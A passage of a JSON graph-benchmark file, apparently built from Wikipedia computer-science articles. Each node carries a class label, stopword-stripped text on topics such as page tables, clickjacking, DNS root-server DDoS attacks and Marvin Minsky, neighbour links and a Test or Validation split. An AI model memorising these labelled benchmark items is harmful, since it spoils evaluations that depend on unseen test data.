    "text": "GyazMail:gyazmail gyazmail email client macos developed maintained japanese programmer goichi hirakawa supports pop3 imap smtp protocols handling multiple email accounts includes local mailboxes gyazmail based native macos cocoa written objective-c. gyazmail uses search function oniguruma regular expression library supports variety character encodings especially relevant asian languages version 1.0.1 released 2003",
    "neighbors": [
      1664,
      9986,
      3465,
      9747,
      11418,
      9642,
      7983,
      1075,
      2101,
      9909,
      576,
      3015,
      10956,
      7255,
      6231,
      10470,
      9451,
      10861,
      8303,
      9459,
      3578,
      8443
    ],
    "mask": "Validation"
  },
  {
    "node_id": 7037,
    "label": 4,
    "text": "Distributed_denial-of-service_attacks_on_root_nameservers:distributed denial-of-service attacks root nameservers distributed denial-of-service attacks root nameservers internet events distributed denial-of-service attacks target one thirteen domain name system root nameserver clusters root nameservers critical infrastructure components internet mapping domain names ip addresses resource record rr data attacks root nameservers could theory impact operation entire global domain name system thus internet services use global dns rather specific websites however practice root nameserver infrastructure highly resilient distributed using inherent features dns result caching retries multiple servers zone fallback one fail recent years combination anycast load balancer techniques used implement thirteen nominal individual root servers globally distributed clusters servers multiple data centers particular caching redundancy features dns mean would require sustained outage major root servers many days serious problems created internet users even still numerous ways isps could set systems period mitigate even total loss root servers extended period time example installing copies global dns root zone data nameservers within network redirecting traffic root server ip addresses servers nevertheless ddos attacks root zone taken seriously risk operators root nameservers continue upgrade capacity ddos mitigation capabilities infrastructure resist future attacks effective attack dns might involve targeting top-level domain servers servicing .com domain instead root name servers alternatively man-in-the-middle attack dns poisoning attack could used though would difficult carry october 21 2002 attack lasting approximately one hour targeted 13 dns root name servers attackers sent many icmp ping packets using botnet servers however servers protected packet filters configured block incoming icmp ping packets sustain much damage little impact internet users february 6 2007 attack began 10:00 utc lasted twenty-four hours least two root servers g-root l-root reportedly suffered badly two others f-root m-root experienced heavy traffic latter two servers largely contained damage distributing requests root server instances anycast addressing icann published formal analysis shortly event due lack detail speculation incident proliferated press details released two intervals november 30 2015 december 1 2015 several root name servers received 5 million queries per second receiving valid queries single undisclosed domain name different domain next day source addresses spread throughout ipv4 space however may spoofed root server networks became saturated resulting timeouts however redundancy among root servers prevented downstream issues occurring incident february 12 2012 statement posted pastebin cited anonymous threatening attack root servers march 31 2012 protest sopa wallstreet irresponsible leaders beloved bankers starving world selfish needs sheer sadistic fun march 31 anonymous shut internet reads statement remember protest trying ‘ kill internet temporarily shutting hurts most…it may last one hour maybe maybe even days matter global known",
    "neighbors": [
      6080,
      2887,
      2409,
      138,
      4883,
      5402,
      9181,
      4863
    ],
    "mask": "None"
  },
  {
    "node_id": 7038,
    "label": 4,
    "text": "Federation_Against_Software_Theft:federation software theft federation software theft fast not-for-profit organisation formed 1984 aim eliminating copyright infringement software uk fast world first anti-piracy organisation work protecting copyrights software publishers initially concentrating lobbying parliament revise copyright law fast also prosecutes organisations individuals copyright infringement behalf members publicises legal penalties security risks prior agreement fast investors software not-for-profit organisation limited guarantee mission support advance professionalism software asset management related asset management enable individuals organisations improve effectiveness efficiency direct result work iso sam iso 19770 standard successfully launched may 2006 september 2008 fast investors software signed exclusive agreement operate federation name strengthen clarify advice given end user community relating best practice software asset management sam achieving cost efficient licence compliance new organisation operate name fast iis may 2008 fast iis launched initiative aim making easier end users manage software licensing requirements contain costs ensure effective software asset management software licence management encompassing compliance software industry research board sirb formed consultation five tier one software vendors fast iis remains not-for-profit organisation limited guarantee wholly owned members include software publishers resellers distributors sam practitioners law firms fast iis works champion professional management software protect members ’ rights since inception fast successfully lobbied changes software ip system uk eu dealings uk intellectual property office fast lobbying efforts brought amendments copyright act 1956 culminating software recognised literary work 2007 fast alliance ip theft successful pushing implementation section 107a copyright designs patents act 1988 ip crime measurement national policing safety plan",
    "neighbors": [],
    "mask": "Test"
  },
  {
    "node_id": 7039,
    "label": 2,
    "text": "Page_table:page table page table data structure used virtual memory system computer operating system store mapping virtual addresses physical addresses virtual addresses used program executed accessing process physical addresses used hardware specifically ram subsystem page table key component virtual address translation necessary access data memory operating systems use virtual memory every process given impression working large contiguous sections memory physically memory process may dispersed across different areas physical memory may moved paged another storage typically hard disk drive process requests access data memory responsibility operating system map virtual address provided process physical address actual memory data stored page table operating system stores mappings virtual addresses physical addresses mapping also known page table entry pte cpu memory management unit mmu stores cache recently used mappings operating system page table called translation lookaside buffer tlb associative cache virtual address needs translated physical address tlb searched first match found tlb hit physical address returned memory access continue however match called tlb miss memory management unit operating system tlb miss handler typically look address mapping page table see whether mapping exists page walk one exists written back tlb must done hardware accesses memory tlb virtual memory system faulting instruction restarted may happen parallel well subsequent translation find tlb hit memory access continue page table lookup may fail two reasons physical memory full simple operation page written back physical memory page table tlb updated instruction restarted however physical memory full one pages physical memory need paged make room requested page page table needs updated mark pages previously physical memory longer mark page disk physical memory tlb also needs updated including removal paged-out page instruction restarted page page subject page replacement algorithms simplest page table systems often maintain frame table page table frame table holds information frames mapped advanced systems frame table also hold information address space page belongs statistics information background information page table holds mapping virtual address page address physical frame also auxiliary information page present bit dirty modified bit address space process id information amongst others secondary storage hard disk used augment physical memory pages paged physical memory disk present bit indicate pages currently present physical memory disk indicate treat different pages i.e whether load page disk page another page physical memory dirty bit allows performance optimization page disk paged physical memory read subsequently paged need written back disk since page changed however page written paged dirty bit set indicating page must written back backing store strategy requires backing store retain copy page paged memory dirty bit used backing store need large instantaneous total size paged-out pages moment dirty bit used times pages exist physical memory backing store operating systems single address space operating systems address space process id information necessary virtual memory management system knows pages associate process two processes may use two identical virtual addresses different purposes page table must supply different virtual memory mappings two processes done assigning two processes distinct address map identifiers using process ids associating process ids virtual memory pages also aid selection pages page pages associated inactive processes particularly processes whose main code page paged less likely needed immediately pages belonging active processes alternative tagging page table entries process-unique identifiers page table may occupy different virtual-memory page process page table becomes part process context implementation process page table paged whenever process longer resident memory several types page tables best suited different requirements essentially bare-bones page table must store virtual address physical address virtual address possibly address space information inverted page table ipt best thought off-chip extension tlb uses normal system ram unlike true page table necessarily able hold current mappings os must prepared handle misses would mips-style software-filled tlb ipt combines page table frame table one data structure core fixed-size table number rows equal number frames memory 4000 frames inverted page table 4000 rows row entry virtual page number vpn physical page number physical address data means creating collision chain see later search entries core ipt structure inefficient hash table may used map virtual addresses address space/pid information need index ipt collision chain used hash table known hash anchor table hashing function generally optimized coverage raw speed desirable course hash tables experience collisions due chosen hashing function may experience lot collisions usage entry table vpn provided check searched entry collision searching mapping hash anchor table used entry exists page fault occurs otherwise entry found depending architecture entry may placed tlb memory reference restarted collision chain may followed exhausted page fault occurs virtual address schema could split two first half virtual page number second half offset page major problem design poor cache locality caused hash function tree-based designs avoid placing page table entries adjacent pages adjacent locations inverted page table destroys spatial locality reference scattering entries operating system may minimize size hash table reduce problem trade-off increased miss rate normally one hash table contiguous physical memory shared processes per-process identifier used disambiguate pages different processes somewhat slow remove page table entries given process os may avoid reusing per-process identifier values delay facing alternatively per-process hash tables may used impractical memory fragmentation requires tables pre-allocated inverted page tables used example powerpc ultrasparc ia-64 architecture inverted page table keeps listing mappings installed frames physical memory however could quite wasteful instead could create page table structure contains mappings virtual pages done keeping several page tables cover certain block virtual memory example create smaller 1024-entry 4k pages cover 4m virtual memory useful since often top-most parts bottom-most parts virtual memory used running process top often used text data segments bottom stack free memory multilevel page table may keep smaller page tables cover top bottom parts memory create new ones strictly necessary smaller page tables linked together master page table effectively creating tree data structure need two levels possibly multiple ones virtual address schema could split three parts index root page table index sub-page table offset page multilevel page tables also referred hierarchical page tables mentioned creating page table structure contained mappings every virtual page virtual address space could end wasteful get around excessive space concerns putting page table virtual memory letting virtual memory system manage memory page table however part linear page table structure must always stay resident physical memory order prevent circular page faults look key part page table present page table present page table etc nested page tables implemented increase performance hardware virtualization providing hardware support page-table virtualization need emulate greatly reduced x86 virtualization current choices intel extended page table feature amd rapid virtualization indexing feature",
    "neighbors": [
      5120,
      3603,
      6675,
      7187,
      10776,
      25,
      541,
      4637,
      3615,
      9762,
      5158,
      7728,
      7217,
      7218,
      9784,
      10809,
      576,
      2625,
      6730,
      6221,
      1614,
      86,
      4695,
      10333,
      97,
      2152,
      8298,
      7285,
      3702,
      9335,
      2168,
      634,
      1147,
      3197,
      1150,
      2179,
      10883,
      4747,
      4237,
      6797,
      9366,
      6296,
      7325,
      9887,
      3248,
      6837,
      1219,
      8388,
      1736,
      2250,
      9932,
      5840,
      6868,
      7382,
      8410,
      1247,
      1253,
      7403,
      5356,
      5363,
      2811,
      1791,
      2304,
      255,
      10499,
      5380,
      1804,
      6924,
      273,
      9490,
      11539,
      3871,
      10016,
      2345,
      814,
      7983,
      823,
      4409,
      7483,
      6974,
      11075,
      4423,
      4424,
      2383,
      5457,
      11601,
      10590,
      8545,
      8551,
      5492,
      11636,
      8573,
      9092,
      394,
      3978,
      5008,
      7057,
      8080,
      11667,
      8092,
      1954,
      421,
      11184,
      7601,
      3512,
      6075,
      6078,
      9151,
      1474,
      8136,
      5074,
      5080,
      7134,
      2015,
      10734,
      6128,
      499,
      5619,
      10235,
      8700
    ],
    "mask": "Test"
  },
  {
    "node_id": 7040,
    "label": 6,
    "text": "In_re_Boucher:boucher boucher case citation 2:06-mj-91 2009 wl 424718 federal criminal case vermont first directly address question whether investigators compel suspect reveal encryption passphrase password despite u.s. constitution fifth amendment protection self-incrimination magistrate judge held producing passphrase would constitute self-incrimination submission appeal district court government stated seek password encrypted hard drive sought force boucher produce contents encrypted hard drive unencrypted format opening drive grand jury district court judge agreed government holding given boucher initial cooperation showing content computer border agents producing complete contents would constitute self-incrimination late 2009 boucher finally gave password investigators found numerous images videos depicting sexual abuse children january 2010 boucher sentenced 3 years prison deported 17 december 2006 laptop computer defendant sebastien d. boucher born 1977 inspected crossed border canada united states derby line vermont laptop powered-up border crossed allowed contents browsed images containing child pornography allegedly seen immigration customs enforcement ice border agents seized laptop questioned boucher arrested complaint charging transportation child pornography violation 18 u.s.c 2252a 1 laptop subsequently powered-down laptop switched booted 29 december 2006 possible access entire storage capability laptop protected pgp disk encryption result investigators working us government unable view contents drive z allegedly contained illegal content grand jury subpoenaed defendant provide password encryption key protecting data november 29 2007 u.s. magistrate judge jerome niedermeier united states district court district vermont stated compelling boucher enter password forces produce evidence could used incriminate accordingly niedermeier quashed subpoena january 2 2008 united states appealed magistrate opinion district court sealed motion court docket case 2:06-mj-00091-wks-jjn-1 appeal heard u.s. district judge william k. sessions oral arguments scheduled april 30 2008 february 19 2009 judge sessions reversed magistrate ruling directed boucher provide unencrypted version z drive viewed ice agent",
    "neighbors": [
      6602,
      3629,
      7794,
      3572,
      4022,
      8283
    ],
    "mask": "Test"
  },
  {
    "node_id": 7041,
    "label": 3,
    "text": "Canon_V-20:canon v-20 canon v-20 msx microcomputer made japanese corporation canon innovative digital camera interface t-90/dmb-90 use canon t90 v-10 quite identical v-20 except less ram memory 16 kb white case",
    "neighbors": [
      8898,
      780,
      3788,
      9006,
      7983,
      1776,
      1403,
      6294,
      2843
    ],
    "mask": "Test"
  },
  {
    "node_id": 7042,
    "label": 9,
    "text": "JConsole:jconsole jconsole graphical monitoring tool monitor java virtual machine jvm java applications local remote machine jconsole uses underlying features java virtual machine provide information performance resource consumption applications running java platform using java management extensions jmx technology jconsole comes part java development kit jdk graphical console started using jconsole command",
    "neighbors": [
      6067,
      5047
    ],
    "mask": "Test"
  },
  {
    "node_id": 7043,
    "label": 7,
    "text": "MLab:mlab mlab fully managed cloud database service hosts mongodb databases mlab runs cloud providers amazon google microsoft azure partnered platform-as-a-service providers may 2011 mlab secured 3 million first-round funding foundry group baseline ventures upfront ventures freestyle capital david cohen october 2012 mlab received follow-on investment 5 million shortly thereafter mlab named network world one 10 useful cloud databases along amazon web services google cloud sql microsoft azure rackspace others june 2014 mongodb inc. announced fully managed highly available mongodb-as-a-service add-on offering microsoft azure store offering delivered collaboration microsoft mlab february 2016 mlab changed name mongolab mlab expand new areas products october 2018 mlab announced acquired mongodb inc. citing reasons shared vision engineering culture engineers mlab invited join mongodb inc. mlab customers transitioned mongodb atlas instances acquisition expected close fourth quarter mongodb ’ fiscal year ending jan. 31 2019",
    "neighbors": [
      7248,
      6932,
      8495,
      1935
    ],
    "mask": "Test"
  },
  {
    "node_id": 7044,
    "label": 4,
    "text": "Clickjacking:clickjacking clickjacking classified user interface redress attack ui redress attack ui redressing malicious technique tricking user clicking something different user perceives thus potentially revealing confidential information allowing others take control computer clicking seemingly innocuous objects including web pages web browsers clickjacking browser security issue vulnerability across variety browsers platforms clickjacking also take place outside web browsers including applications clickjack takes form embedded code script execute without user knowledge clicking button appears perform another function clickjacking instance confused deputy problem wherein computer innocently fooled misusing authority 2002 noted possible load transparent layer web page user input affect transparent layer without user noticing however mainly ignored major issue 2008 2008 jeremiah grossman robert hansen discovered adobe flash player able clickjacked allowing attacker gain access computer without user knowledge term clickjacking coined jeremiah grossman robert hansen portmanteau words click hijacking attacks similar nature discovered focus term ui redressing changed describe category attacks rather clickjacking clickjacking takes advantage vulnerabilities present applications web pages allow attacker manipulate user computer example clickjacked page tricks user performing undesired actions clicking concealed link clickjacked page attackers load another page transparent layer unsuspecting users think clicking visible buttons actually performing actions invisible page hidden page may authentic page therefore attackers trick users performing actions users never intended way tracing actions attackers later users would genuinely authenticated hidden page clickjacking limited type though present forms classic clickjacking refers attacker uses hidden layers web pages manipulate actions user cursor resulting user mislead truly clicked user might receive email link video news item another webpage say product page amazon hidden top underneath play button news video user tries play video actually buys product amazon hacker send single click rely fact visitor logged amazon.com 1-click ordering enabled technical implementation attacks may challenging due cross-browser incompatibilities number tools beef metasploit project offer almost fully automated exploitation clients vulnerable websites clickjacking may facilitated may facilitate web attacks xss likejacking malicious technique tricking users website liking facebook page intentionally mean like term likejacking came comment posted corey ballou article like anything web safely one first documented postings explaining possibility malicious activity regarding facebook like button according article ieee spectrum solution likejacking developed one facebook hackathons like bookmarklet available avoids possibility likejacking present facebook like button nested clickjacking compared classic clickjacking works embedding malicious web frame two frames original harmless web page framed page displayed top window works due vulnerability http header codice_1 element value codice_2 web browser checks two aforementioned layers fact additional frames added two remaining undetected means attackers use benefit past google+ faulty version codice_1 attackers able insert frames choice using vulnerability present google image search engine image display frames present google+ well attacker-controlled frames able load restricted allowing attackers mislead whoever came upon image display page cursorjacking ui redressing technique change cursor location user perceives discovered 2010 eddy bordi researcher vulnerability.fr marcus niemietz demonstrated custom cursor icon 2012 mario heiderich hiding cursor jordi chancel researcher alternativ-testing.fr discovered cursorjacking vulnerability using flash html javascript code mozilla firefox mac os x systems fixed firefox 30.0 lead arbitrary code execution webcam spying second cursorjacking vulnerability discovered jordi chancel mozilla firefox mac os x systems fixed firefox 37.0 using flash html javascript code lead also spying webcam execution malicious addon allowing execution malware computer trapped user browserless clickjacking attackers utilize vulnerabilities programs replicate classic clickjacking without required use presence web browser method clickjacking mainly prevalent among mobile devices usually android devices especially due way toast notifications work toast notifications small delay moment notification requested moment notification actually displays on-screen attackers capable using gap create dummy button lies hidden underneath notification still clicked cookiejacking form clickjacking cookies stolen web browsers done tricking user dragging object seemingly appears harmless fact making user select entire content cookie targeted attacker acquire cookie data within filejacking attackers use web browser capability navigate computer access computer files order acquire personal data tricking user establishing active file server file folder selection window browsers use attackers access take files victims computers 2014 paper researcher carnegie mellon university found browsers refuse autofill protocol current login page different protocol time password saved password managers would insecurely fill passwords http version https-saved passwords managers protect iframe- redirection-based attacks exposed additional passwords password synchronization used multiple devices protection clickjacking including likejacking added mozilla firefox desktop mobile versions installing noscript add-on clearclick feature released 8 october 2008 prevents users clicking invisible redressed page elements embedded documents applets according google browser security handbook year 2008 noscript clearclick freely available product offers reasonable degree protection clickjacking protection newer cursorjacking attack added noscript 2.2.8 rc1 noclickjack web browser add-on browser extension adds client-side clickjack protection users google chrome mozilla firefox opera microsoft edge without interfering operation legitimate iframes noclickjack based technology developed guardedid noclickjack add-on free guardedid commercial product includes client-side clickjack protection users internet explorer without interfering operation legitimate iframes guardedid clickjack protection forces frames become visible guardedid teams web browser add-on noclickjack add protection google chrome mozilla firefox opera microsoft edge gazelle microsoft research project secure web browser based ie uses os-like security model limited defenses clickjacking gazelle window different origin may draw dynamic content another window screen space content draws opaque web site owners protect users ui redressing frame based clickjacking server side including framekiller javascript snippet pages want included inside frames different sources javascript-based protection unfortunately always reliable especially true internet explorer kind countermeasure circumvented design including targeted page inside iframe security=restricted element introduced 2009 internet explorer 8 new http header codice_1 offered partial protection clickjacking shortly adopted browsers safari firefox chrome opera header set website owner declares preferred framing policy values codice_5 codice_2 codice_7 prevent framing framing external sites allow framing specified site respectively addition advertising sites return non-standard codice_8 value intention allow framing content page equivalent setting x-frame-options 2013 x-frame-options header officially published rfc 7034 internet standard document provided informational purposes w3c content security policy level 2 recommendation provides alternative security directive frame-ancestors intended obsolete x-frame-options header security header like x-frame-options protect users clickjacking attacks using frame codice_9 directive content security policy introduced version 1.1 allow disallow embedding content potentially hostile pages using iframe object etc directive obsoletes x-frame-options directive page served headers frame-ancestors policy preferred browser.—although popular browsers disobey requirement example frame-ancestors policies",
    "neighbors": [
      3072,
      5636,
      10245,
      10756,
      8202,
      9227,
      9233,
      9242,
      7708,
      9761,
      9256,
      9771,
      10297,
      3643,
      7739,
      9791,
      1088,
      4163,
      4165,
      9809,
      4198,
      107,
      3700,
      5245,
      6786,
      5764,
      9356,
      4245,
      10392,
      1690,
      5281,
      2213,
      8387,
      8921,
      4314,
      9949,
      4326,
      4344,
      3320,
      4863,
      1279,
      7441,
      8978,
      4883,
      278,
      3867,
      10015,
      8998,
      300,
      3391,
      3395,
      4945,
      7515,
      4956,
      9055,
      3941,
      4453,
      11621,
      1899,
      877,
      9591,
      7547,
      8584,
      9102,
      5012,
      1429,
      10141,
      5543,
      939,
      1970,
      4023,
      6588,
      5054,
      2508,
      5078,
      3032,
      9187,
      5621,
      5622,
      2041,
      507
    ],
    "mask": "None"
  },
  {
    "node_id": 7045,
    "label": 7,
    "text": "High_Level_Architecture:high level architecture high-level architecture hla standard distributed simulation used building simulation larger purpose combining federating several simulations standard developed 90 ’ leadership us department defense later transitioned become open international ieee standard recommended standard within nato stanag 4603 today hla used number domains including defense security civilian applications architecture specifies following components together components form federation hla standard consists three parts hla initiated early 1990 ’ dr. anita k. jones director defense research engineering within us department defense gave defense modeling simulation office dmso task “ assuring interoperability reusability defense models simulations ” 1995 dmso formulated vision modeling simulation established modeling simulation masterplan included high-level architecture two protocols interoperability already existed distributed interactive simulation dis focusing real-time platform level simulation fixed object model aggregate level simulation protocol alsp focusing simulation aggregate time management ownership management flexible object models called confederation models purpose hla provide one unified standard would meet simulation interoperability requirements us dod components development hla based four prototypical federations platform prototype federation joint training protofederation analysis protofederation engineering prototype federation hla specification prototyped refined hla 1.3 finally released facilitate usage outside defense community hla transitioned ieee standard maintained simulation interoperability standards organization siso facilitate migration dis users federation object model corresponding fixed object model dis also developed real-time platform reference fom rpr fom following hla versions exist hla 1.3 published march 1998 dmso consists us dod also published interpretations hla 1.3 hla ieee 1516-2000 published 2000 ieee consists major improvements ieee 1516-2000 included xml-based fom detailed data type specifications well improved ddm design ieee 1516-2000 standard also complemented recommended development process well recommended vv process soon found 1516-2000 standard apis slightly different rti implementation siso produced standard alternate dynamic link compatible dlc c++ java apis dlc apis later merged main standard ieee 1516-2010 standard published august 2010 ieee commonly known hla evolved consists major improvements ieee 1516-2010 include modular foms incorporation dlc apis c++ java web services api fault tolerance machine-readable parts version hla xml schemas c++ java wsdl apis well fom/som samples downloaded ieee 1516 download area ieee web site full standards texts available extra cost siso members purchased ieee shop development new version hla started january 2016 siso currently ongoing hla standard consists three parts rti services defined hla interface specification grouped seven service groups addition services management object model mom provides services makes possible inspect adjust state federation programmatically rtis consist central rti component crc executable local rti components lrcs libraries used federates services provided c++ java api also using web services c++ java apis services invoked using calls instance rti ambassador class rti delivers information federate using callbacks delivered using calls instance federate ambassador class web services api defined using wsdl calls made callbacks fetched federate using web services requests responses service group descriptions focus key services exceptions advisories included purpose federation management services manage federation executions well federation-wide operations synchronization points save/restore one set federation management services manages connection rti federation execution set joined federates key services another set services relates synchronization points federation-wide events selected federates required complete operation initializing scenario execution continue key services yet another set service relates saving restoring federation execution save operation requires rti federate perform save internal state restore operation requires rti federate perform restore internal state key services save restore purpose declaration management services enable federates declare information wish publish send subscribe receive based object interaction classes fom rti uses information route updates interactions subscribing federates object class publishing subscribing performed specific set attributes interaction classes entire interaction including parameters published subscribed key services purpose object management services enable federates share information object instances exchange interactions object instance names reserved automatically generated federates register object instances specified object classes discovered subscribing federates attributes object instances updated updates reflected subscribing federates interactions sent interactions delivered subscribing federates key services objects attributes interactions purpose ownership management services dynamically manage federate simulates aspect object instance hla one federate allowed update given attribute given object instance federate considered owner attribute federate registers new object instance automatically owner attributes publishes cases attributes object instance may become unowned i.e owned federate ownership management provides services transferring ownership one several attributes runtime include federate divesting attribute another federate acquiring attribute two main patterns “ pull ” initiated acquiring federate “ push ” initiated divesting federate key services initiating “ pull ” ownership key services initiating “ push ” ownership object instances predefined attribute called hlaprivilegetodeleteobject owner attribute object instance allowed delete object instance ownership attribute transferred runtime using operations information exchange hla federation takes place real-time immediate receive order ro delivery messages unless hla time management enabled purpose hla time management guarantee causality correct consistent exchange time stamped messages updates interactions time stamp order tso matter federation executes real-time faster-than-real-time slower-than-real-time as-fast-as-possible important concepts hla time management logical time time axis hla starting zero logical time used time management timestamps operations logical time axis mapped scenario time federation example mapping let zero represent scenario time 8:00 1-jan-1066 let increment one represent one second scenario lookahead time interval specifying lowest time future federate produce messages federate fixed time step usually length time step granted federate granted allowed advance particular logical time rti time-stamped messages time delivered federate safely start calculating messages timestamp future timestamp may earlier granted time plus federates lookahead advancing federate finished producing data granted time plus lookahead may request advanced later time also means promises produce messages time stamp less requested time plus lookahead federate advancing state time regulating federate sends time stamped events considered time regulating since time advance federates may regulated time constrained federate receives time managed events considered time constrained since reception time stamped messages constrains time advance main principles hla time management example lookahead granted advancing least one federate federation performs pacing i.e correlates time advance requests real time clock federation may run real time scaled real time without pacing federation run fast possible used example monte carlo simulation key services include event driven simulation also possible federate request advanced next event using following service another important concept greatest available logical time galt greatest time federate granted depends time federates granted well lookahead galt federate specifies far federate granted without wait federates granted particularly interesting federate joins late time managed federation key services galt advanced services include order ensure proper interaction simulations way testing federate conformance defined involves ensuring every class interaction listed som particular federate used according usage described publishsubscribe publish subscribe none hla 1516-2010 instead single fdd describes entire fom specification describes fom modules merged form full fom default federation created merging hlastandardmim.xml fom module module provided federate creates federation standard mim mom initialization module contains mom classes basic default data types joining federate add one fom modules extend existing fom principle nothing changes federates call functions rti difference elements fom needed loaded managed addition federate joins late additional information exchange requirements added modular foms used hla rules describe responsibilities federations federates join ieee 1516 standard revised siso hla-evolved product development group approved 25-mar-2010 ieee standards activities board revised ieee 1516–2010 standard includes current dod standard interpretations edlc api extended version siso dlc api major improvements include hla current ieee 1516 version ancestor 1.3 version subject nato standardization agreement stanag 4603 modeling simulation modeling simulation architecture standards technical interoperability high level architecture hla base object model bom siso-std-003-2006 related standard siso provide better reuse composability hla simulations highly relevant hla developers provides way specify conceptual models map hla fom virtually means interconnecting distributed modeling simulation dm applications alternatives disadvantages hla exception regards distributed modeling simulation dm industry often used alternative hla distributed interactive simulation dis ieee 1278.1-2012 recently updated simulation protocol hla rti vendors also feature dis products middleware applications closely match hla features publish subscribe feature p see data distribution service dds shares many characteristics open on-the-wire protocol system interoperability hla message-oriented middleware defines set services provided c++ java api standardized on-the-wire protocol participants federation must use rti libraries provider usually also version order applications interoperate",
    "neighbors": [
      1280,
      2948,
      7049,
      11404,
      5270,
      5671,
      2346,
      6187,
      4396,
      5677,
      434,
      3762,
      11321,
      5439,
      3780,
      4557,
      4581,
      5863,
      11125,
      6904,
      8828
    ],
    "mask": "None"
  },
  {
    "node_id": 7046,
    "label": 7,
    "text": "Carry-I:carry-i carry-i model number ft-6200 intel 80286-based book-size diskless node produced flytech technology taiwan circa 1991 system bundled dr dos 5.0 australia system sold company hypec technology pty ltd",
    "neighbors": [
      178,
      10926
    ],
    "mask": "None"
  },
  {
    "node_id": 7047,
    "label": 8,
    "text": "Bounce_rate:bounce rate bounce rate internet marketing term used web traffic analysis represents percentage visitors enter site leave bounce rather continuing view pages within site bounce rate calculated counting number single page visits dividing total visits represented percentage total visits bounce rate measure stickiness thinking effective website engage visitors deeper website encouraging visitors continue visit expressed percentage represents proportion single page visits total visits bounce rate visits access single page ÷ total visits website bounce rates used help determine effectiveness performance entry page generating interest visitors entry page low bounce rate means page effectively causes visitors view pages continue deeper web site high bounce rates typically indicate website good job attracting continued interest visitors means visitors view single pages without looking others taking form action within site specified time period interpretation bounce rate measure relevant website business objectives definitions conversion high bounce rate always sign poor performance sites objective met without viewing one page example websites sharing specific knowledge subject dictionary entry specific recipe bounce rate would meaningful determining conversion success contrast bounce rate e-commerce site could interpreted correlation purchase conversion rate providing bounces considered representative visits purchase made typically bounce rate e-commerce websites range 20 45 top performers operating 36 average bounce rate bounce occurs web site visitor views single page website visitor leaves site without visiting pages specified session-timeout occurs industry standard minimum maximum time visitor must leave order bounce occur rather determined session timeout analytics tracking software formula_1 visitor may bounce two exceptions 1 one-page website 2 offline value proposition compelling people would see one single webpage get information need leave commonly used session timeout value 30 minutes case visitor views page look another page leaves browser idle longer 30 minutes register bounce visitor continues navigate delay new session occur bounce rate single page number visitors enter site page leave within specified timeout period without viewing another page divided total number visitors entered site page contrast bounce rate web site number web site visitors visit single page web site per session divided total number web site visits site-wide bounce rate useful metric sites well-defined conversion steps requiring multiple page views may questionable value sites visitors likely find looking entry page type behavior common web portals referential content sites example visitor looking definition particular word may enter online dictionary site word definition page similarly visitor wants read specific news story may enter news site article written story example entry pages could bounce rate 80 thereby increasing site-wide average however may still considered successful",
    "neighbors": [
      3912,
      2945,
      6576,
      735
    ],
    "mask": "Validation"
  },
  {
    "node_id": 7048,
    "label": 9,
    "text": "Marvin_Minsky:marvin minsky marvin lee minsky august 9 1927 – january 24 2016 american cognitive scientist concerned largely research artificial intelligence ai co-founder massachusetts institute technology ai laboratory author several texts concerning ai philosophy marvin lee minsky born new york city eye surgeon father henry mother fannie zionist activist family jewish attended ethical culture fieldston school bronx high school science later attended phillips academy andover massachusetts served us navy 1944 1945 received b.a mathematics harvard university 1950 ph.d. mathematics princeton university 1954 mit faculty 1958 death joined staff mit lincoln laboratory 1958 year later john mccarthy initiated named mit computer science artificial intelligence laboratory toshiba professor media arts sciences professor electrical engineering computer science minsky inventions include first head-mounted graphical display 1963 confocal microscope 1957 predecessor today widely used confocal laser scanning microscope developed seymour papert first logo turtle minsky also built 1951 first randomly wired neural network learning machine snarc 1962 minsky published 7,4 turing machine able prove universal time simplest known universal turing machine record stood 40 years stephen wolfram published 2,5 universal turing machine 2002 book new kind science minsky wrote book perceptrons seymour papert attacking work frank rosenblatt became foundational work analysis artificial neural networks book center controversy history ai claim great importance discouraging research neural networks 1970s contributing so-called ai winter also founded several famous ai models book framework representing knowledge created new paradigm programming perceptrons historical practical book theory frames wide use minsky also wrote possibility extraterrestrial life may think like humans permitting communication early 1970s mit artificial intelligence lab minsky papert started developing came known society mind theory theory attempts explain call intelligence could product interaction non-intelligent parts minsky says biggest source ideas theory came work trying create machine uses robotic arm video camera computer build children blocks 1986 minsky published society mind comprehensive book theory unlike previously published work written general public november 2006 minsky published emotion machine book critiques many popular theories human minds work suggests alternative theories often replacing simple ideas complex ones recent drafts book freely available webpage minsky adviser stanley kubrick movie one movie characters victor kaminski named minsky honor minsky mentioned explicitly arthur c. clarke derivative novel name portrayed achieving crucial break-through artificial intelligence then-future 1980s paving way hal 9000 early 21st century 1952 minsky married pediatrician gloria rudisch together three children minsky talented improvisational pianist published musings relations music psychology minsky atheist signatory scientists open letter cryonics critic loebner prize conversational robots argued fundamental difference humans machines humans machines machines intelligence emerges interplay many unintelligent semi-autonomous agents comprise brain argued somewhere line computers become intelligent people hard predict fast progress would cautioned artificial superintelligence designed solve innocuous mathematical problem might decide assume control earth resources build supercomputers help achieve goal believed negative scenarios hard take seriously felt confident ai would go lot testing deployed minsky died cerebral hemorrhage age 88 minsky member alcor scientific advisory board believed cryonically preserved alcor presumably patient 144 whose cooling procedures began january 27 2016 2019 virginia giuffre named minsky one jeffrey epstein child trafficking clients unsealed deposition federal court minsky turing award greatest distinction computer science 1969 japan prize 1990 ijcai award research excellence 1991 benjamin franklin medal franklin institute 2001 2006 inducted fellow computer history museum co-founding field artificial intelligence creating early neural networks robots developing theories human machine cognition 2011 minsky inducted ieee intelligent systems ai hall fame significant contributions field ai intelligent systems 2014 minsky dan david prize artificial intelligence digital mind also awarded 2013 bbva foundation frontiers knowledge award information communication technologies category minsky affiliated following organizations",
    "neighbors": [
      9975,
      11020,
      3728,
      2577,
      4633,
      7069,
      4643,
      10668,
      2482,
      1976,
      3389,
      3261,
      4799,
      4800,
      10049,
      4930,
      11075,
      70,
      9288,
      3529,
      1883,
      989,
      7775,
      9315,
      10211,
      10981,
      11242,
      2283,
      5611,
      2798,
      9969,
      1783,
      504,
      6906,
      511
    ],
    "mask": "None"
  },
  {
    "node_id": 7049,
    "label": 5,
